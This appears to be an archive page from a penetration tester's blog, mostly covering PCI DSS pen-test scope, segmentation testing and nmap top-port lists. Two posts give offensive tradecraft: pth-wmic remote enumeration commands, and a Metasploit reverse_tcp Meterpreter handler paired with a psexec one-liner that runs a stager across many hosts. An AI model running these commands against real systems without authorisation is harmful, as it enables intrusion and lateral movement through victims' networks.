Friday, June 24, 2016

Do You Need to Perform a Pen Test from Inside the CDE for PCI?

But what about Pen Testing from inside the CDE? Is that required?

PCI 3.x has no requirement to Pen Test from within the CDE. This is a common misunderstanding, propagated by a long-standing lack of guidance. With the March 2015 Information Supplement: Penetration Testing Guidance, we were finally able to address this directly: 

"It is not a requirement to test from within the CDE to the servers inside the CDE; and testing exclusively from within the CDE perimeter will not satisfy the requirement. However, when access to the CDE is obtained as a result of the testing, the penetration tester may elect to continue exploring inside the network and further the attack against other systems within the CDE, and may also include testing any data-exfiltration prevention (data-loss prevention) controls that are in place."

This is not a requirement and should only be done with care. When we have compromised the CDE of a organization, we will examine data-exfiltration controls and egress rules any time it is safe to do so. 

Hopefully this information can clear up any misconceptions about scanning and scope and what’s required for the latest version of the Standard.

Wednesday, June 22, 2016

Pen Test Enumeration with WMI

My client has disabled SMBv1/2 on the majority of their systems and that has made using many tools impossible. What I wanted was a netstat from each of the boxes to check connections, so I went down the WMI road looking for answers. That was a dead end, but I did discover some useful objects to query with WMI that might help your investigations. This requires WMI to be enabled, which was spotty on workstations but was enabled on all of my Client’s servers.

Find out who is logged onto the box
pth-wmic -U 'domain\username'%'Asdf1234' // "select * from Win32_LoggedOnUser"

pth-wmic -U 'domain\username'%'Asdf1234' // "select Buildtype from win32_operatingsystem"

Running Processes
pth-wmic -U 'domain\username'%'Asdf1234' // "select csname,name from win32_process"

Active Route
pth-wmic -U 'domain\username'%'Asdf1234' // "select * from Win32_ActiveRoute”

All the routes
pth-wmic -U 'domain\username'%'Asdf1234' // "select name from Win32_IP4RouteTable"

Because I can never remember the syntax 
for i in `cat /mnt/hgfs/PenTests/CLIENT/PortScans/10.445-1\all.txt`; do echo $i; pth-wmic -U 'domain\username'%'Asdf1234' //$i "select csname,name from win32_process"; done

If you have a better way or know of a way to pull a netstat without SMB enabled, please let me know in the comments.

Monday, June 20, 2016

Meterpreter over TCP/139

My Client has closed all but port 139 of the netbios ports, preventing me from using Metaplsoit’s PSEXEC. But, Mark Russinovich’s version from Microsoft will work just as well, albeit a hell of a lot slower.

Prep your loader following the instructions at

Nmap all the 139 open ports and drop them into a file. Set up your handler. I use this with good success:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LPORT 4455
set EnableStageEncoding true
set AutoRunScript post/windows/manage/migrate
exploit -j –z

Download the original PSEXEC from Microsoft and run the following Windows script one-liner:

FOR /F %A IN (139.txt) DO psexec -s -u DOMAIN\user -p PASSWORD \\%A \\\Share\stage.exe 

If you want to use this in a batch file, double up on the % for the variables, like FOR /F %%A IN… 

Using Masscan with Top Ports

Want to use masscan like nmap and scan just the “top ports”? A quick way of getting that list of ports is to run the following nmap command:

nmap -F -oG - -v --top-ports N

Where N is the number of ports.

Example Top 100:
nmap -F -oG - -v --top-ports 100

# Nmap 7.01 scan initiated Mon Jun 20 10:38:30 2016 as: nmap -F -oG - -v --top-ports 100
# Ports scanned: TCP(100;7,9,13,21-23,25-26,37,53,79-81,88,106,110-111,113,119,135,139,143-144,179,199,389,427,443-445,465,513-515,543-544,548,554,587,631,646,873,990,993,995,1025-1029,1110,1433,1720,1723,1755,1900,2000-2001,2049,2121,2717,3000,3128,3306,3389,3986,4899,5000,5009,5051,5060,5101,5190,5357,5432,5631,5666,5800,5900,6000-6001,6646,7070,8000,8008-8009,8080-8081,8443,8888,9100,9999-10000,32768,49152-49157) UDP(0;) SCTP(0;) PROTOCOLS(0;)
setup_target: failed to determine route to
WARNING: No targets were specified, so 0 hosts scanned.
# Nmap done at Mon Jun 20 10:38:30 2016 -- 0 IP addresses (0 hosts up) scanned in 0.04 seconds 

Example Top 1000:
nmap -F -oG - -v --top-ports 1000

# Nmap 7.01 scan initiated Mon Jun 20 10:38:45 2016 as: nmap -F -oG - -v --top-ports 1000
# Ports scanned: TCP(1000;1,3-4,6-7,9,13,17,19-26,30,32-33,37,42-43,49,53,70,79-85,88-90,99-100,106,109-111,113,119,125,135,139,143-144,146,161,163,179,199,211-212,222,254-256,259,264,280,301,306,311,340,366,389,406-407,416-417,425,427,443-445,458,464-465,481,497,500,512-515,524,541,543-545,548,554-555,563,587,593,616-617,625,631,636,646,648,666-668,683,687,691,700,705,711,714,720,722,726,749,765,777,783,787,800-801,808,843,873,880,888,898,900-903,911-912,981,987,990,992-993,995,999-1002,1007,1009-1011,1021-1100,1102,1104-1108,1110-1114,1117,1119,1121-1124,1126,1130-1132,1137-1138,1141,1145,1147-1149,1151-1152,1154,1163-1166,1169,1174-1175,1183,1185-1187,1192,1198-1199,1201,1213,1216-1218,1233-1234,1236,1244,1247-1248,1259,1271-1272,1277,1287,1296,1300-1301,1309-1311,1322,1328,1334,1352,1417,1433-1434,1443,1455,1461,1494,1500-1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687-1688,1700,1717-1721,1723,1755,1761,1782-1783,1801,1805,1812,1839-1840,1862-1864,1875,1900,1914,1935,1947,1971-1972,1974,1984,1998-2010,2013,2020-2022,2030,2033-2035,2038,2040-2043,2045-2049,2065,2068,2099-2100,2103,2105-2107,2111,2119,2121,2126,2135,2144,2160-2161,2170,2179,2190-2191,2196,2200,2222,2251,2260,2288,2301,2323,2366,2381-2383,2393-2394,2399,2401,2492,2500,2522,2525,2557,2601-2602,2604-2605,2607-2608,2638,2701-2702,2710,2717-2718,2725,2800,2809,2811,2869,2875,2909-2910,2920,2967-2968,2998,3000-3001,3003,3005-3007,3011,3013,3017,3030-3031,3052,3071,3077,3128,3168,3211,3221,3260-3261,3268-3269,3283,3300-3301,3306,3322-3325,3333,3351,3367,3369-3372,3389-3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689-3690,3703,3737,3766,3784,3800-3801,3809,3814,3826-3828,3851,3869,3871,3878,3880,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000-4006,4045,4111,4125-4126,4129,4224,4242,4279,4321,4343,4443-4446,4449,4550,4567,4662,4848,4899-4900,4998,5000-5004,5009,5030,5033,5050-5051,5054,5060-5061,5080,5087,5100-5102,5120,5190,5200,5214,5221-5222,5225-5226,5269,5280,5298,5357,5405,5414,5431-5432,5440,5500,5510,5544,5550,5555,5560,5566,5631,5633,5666,5678-5679,5718,5730,5800-5802,5810-5811,5815,5822,5825,5850,5859,5862,5877,5900-5904,5906-5907,5910-5911,5915,5922,5925,5950,5952,5959-5963,5987-5989,5998-6007,6009,6025,6059,6100-6101,6106,6112,6123,6129,6156,6346,6389,6502,6510,6543,6547,6565-6567,6580,6646,6666-6669,6689,6692,6699,6779,6788-6789,6792,6839,6881,6901,6969,7000-7002,7004,7007,7019,7025,7070,7100,7103,7106,7200-7201,7402,7435,7443,7496,7512,7625,7627,7676,7741,7777-7778,7800,7911,7920-7921,7937-7938,7999-8002,8007-8011,8021-8022,8031,8042,8045,8080-8090,8093,8099-8100,8180-8181,8192-8194,8200,8222,8254,8290-8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651-8652,8654,8701,8800,8873,8888,8899,8994,9000-9003,9009-9011,9040,9050,9071,9080-9081,9090-9091,9099-9103,9110-9111,9200,9207,9220,9290,9415,9418,9485,9500,9502-9503,9535,9575,9593-9595,9618,9666,9876-9878,9898,9900,9917,9929,9943-9944,9968,9998-10004,10009-10010,10012,10024-10025,10082,10180,10215,10243,10566,10616-10617,10621,10626,10628-10629,10778,11110-11111,11967,12000,12174,12265,12345,13456,13722,13782-13783,14000,14238,14441-14442,15000,15002-15004,15660,15742,16000-16001,16012,16016,16018,16080,16113,16992-16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,19842,20000,20005,20031,20221-20222,20828,21571,22939,23502,24444,24800,25734-25735,26214,27000,27352-27353,27355-27356,27715,28201,30000,30718,30951,31038,31337,32768-32785,33354,33899,34571-34573,35500,38292,40193,40911,41511,42510,44176,44442-44443,44501,45100,48080,49152-49161,49163,49165,49167,49175-49176,49400,49999-50003,50006,50300,50389,50500,50636,50800,51103,51493,52673,52822,52848,52869,54045,54328,55055-55056,55555,55600,56737-56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,64623,64680,65000,65129,65389) UDP(0;) SCTP(0;) PROTOCOLS(0;)
setup_target: failed to determine route to
WARNING: No targets were specified, so 0 hosts scanned.
# Nmap done at Mon Jun 20 10:38:45 2016 -- 0 IP addresses (0 hosts up) scanned in 0.05 seconds

See for more information on how the top ports are determined.


Thursday, April 7, 2016

Getting Started in Penetration Testing

I have a page written specifically to answer this question at:

Have a look at the community section, specifically Getting Started In Pen Testing

I would love any feedback from the community on how to make it even better. This question comes up a lot and we need to provide a path for talented, passionate security people to increase their skills.

Wednesday, December 2, 2015

Segmentation Checking for PCI Requirement 11.3.4

PCI 3.0 introduced Requirement 11.3.4: “If segmentation is used to isolate the CDE from other networks, perform penetration tests at least annually and after any changes to segmentation controls/methods to verify that the segmentation methods are operational and effective, and isolate all out-of-scope systems from in-scope systems.” The PCI DSS v3.0 Requirements and Security Assessment Procedures Testing Procedures specified for Requirement 11.3.4.a also states “Examine segmentation controls and review penetration-testing methodology to verify that penetration-testing procedures are defined to test all segmentation methods to confirm they are operational and effective, and isolate all out-of-scope systems from in-scope systems.” 

This requirement is intended to verify that network segments documented as out-of-scope are truly out-of-scope and that this has been verified by someone with a degree of technical expertise. The scary parts of this standard are the “All segmentation methods” and "all out-of-scope systems from in-scope systems.” That could be quite a task depending on the number of methods used to provide segmentation and the number of out-of-scope systems.

Fortunately, the Special Interest Group on Penetration Testing, of which I was honored to be the co-proposer and a lead contributor,  was in the midst of finalizing its guidance. Recognizing that, as written, this requirement could place an unrealistic burden on Merchants and Service Providers, we were able to work with the Council to provide the option for sampling. This excerpt from the guidance addresses 11.3.4:

Segmentation Checks
"PCI DSS Requirement 11.3.4 requires penetration testing to validate that segmentation controls and methods are operational, effective, and isolate all out-of-scope systems from systems in the CDE. Therefore, a robust approach to penetration testing is recommended to satisfy this requirement by actively attempting to identify routes and paths from networks outside the CDE into the CDE. All segmentation methods need to be specifically tested. In very large networks, with numerous internal LAN segments, it may be infeasible for the penetration tester to conduct specific tests from every individual LAN segment. In this case, the testing needs to be planned to examine each type of segmentation methodology in use (i.e., firewall, VLAN ACL, etc.) in order to validate the effectiveness of the segmentation controls. The level of testing for each segmentation methodology should provide assurance that the methodology is effective in all instances of use. In order to effectively validate the segmentation methodologies, it is expected that the penetration tester has worked with the organization (or the organization’s QSA) to clearly understand all methodologies in use in order to provide complete coverage when testing."

As long as the testing provides assurances that the segmentation methodology is effective, testing from every individual LAN segment is not necessary. My recommended approach is to perform testing from network segments where privileged users securely access the CDE and sample a reasonable number of all other segments for each type of segmentation methodology in use. This will meet the requirement without putting undue burden on the client while providing the assessor  or auditor with sufficient information on which to base a determination of segmentation effectiveness.

Friday, June 5, 2015

Do you need to do an internal pen test when the CDE is in the Cloud?

We have a Cloud based, virtual data center that we access and manage using a 2-factor, on-demand VPN to a remote jump-box from anywhere in the world. As a result, our corporate network and admin machines are considered out-of-scope for PCI. Do we still need to do an internal penetration test?

Our experience is that these tests are limited and quick, however they must be done.  While it’s true that in this case the in-scope systems could just as easily be administered from a Starbucks, the administrator’s workstation in a Starbucks cannot easily be compromised by exploiting other systems in the coffee shop, whereas in the corporate network the administrator's system is often joined to a domain and can be affected by other systems in the domain. The environment where users routinely access in scope systems will present an attacker with a unique opportunity to steal those credentials or manipulate that traffic.  Such an opportunity would not be afforded to an attacker in a Starbucks. The interrelationship of systems inside the corporate network creates a unique set a threat vectors that must be tested.

So for PCI Pen Testing, a corporate network is defined as having a common network connect AND localized common resources such as file shares and authentication mechanisms.